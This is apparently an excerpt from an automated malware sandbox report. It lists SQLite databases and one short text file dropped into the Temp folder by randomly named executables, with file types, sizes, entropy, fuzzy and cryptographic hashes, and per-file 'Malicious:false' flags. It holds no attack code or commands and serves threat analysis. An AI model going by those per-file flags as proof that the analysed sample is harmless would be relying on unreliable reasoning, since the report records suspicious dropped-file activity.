                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\6iyye6h3o4

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\6vXRyUj3VV

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25
                                                                                                                          Entropy (8bit):4.293660689688185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ztBzVWVNtZon:JBzVWV/Zo
                                                                                                                          MD5:AE21AD7B1D3879E8C5334F0A4350B434
                                                                                                                          SHA1:C50E711CB80C65EF4469FEB83992921543A69F69
                                                                                                                          SHA-256:AF2C3099B9B4A692A49B6B0576AA7BCBE5DA74E0378A8FC35E7CC29EAF701B30
                                                                                                                          SHA-512:4DC44B9DEB9E31BDF5E63D97EF9E2EC6608B2D6E079765AE1E0B34CD779C5DCBD16C4D4C0067FB0875EBD66C4708D897323462A331CB36D6A3433D371D57B23C
                                                                                                                          Malicious:false
                                                                                                                          Preview:G5UYwNCdVRn4sphHdJepX9dni

                                                                                                                          C:\Users\user\AppData\Local\Temp\71JaG2LaFb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\776cWHNMJK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zuha0lOQE

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\8VdNCCvxCk

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\8cwBaR13Aw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\8pCM97g9cM

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\8v1uQDfBl8

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\9NE9RaK8T2

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\9ZCmhPuZMb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Ah1AdUsPFr

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\AhadVyVMDZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\AvyXnhTFMr

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Aw0yubKv3w

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\BDMpcxPJj1

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\BU4n9xMcY5

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\CM9Ggmqs4K

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\CUy7GhCY3m

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\DSBQFgdfxb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\DmO0Jlx0AX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
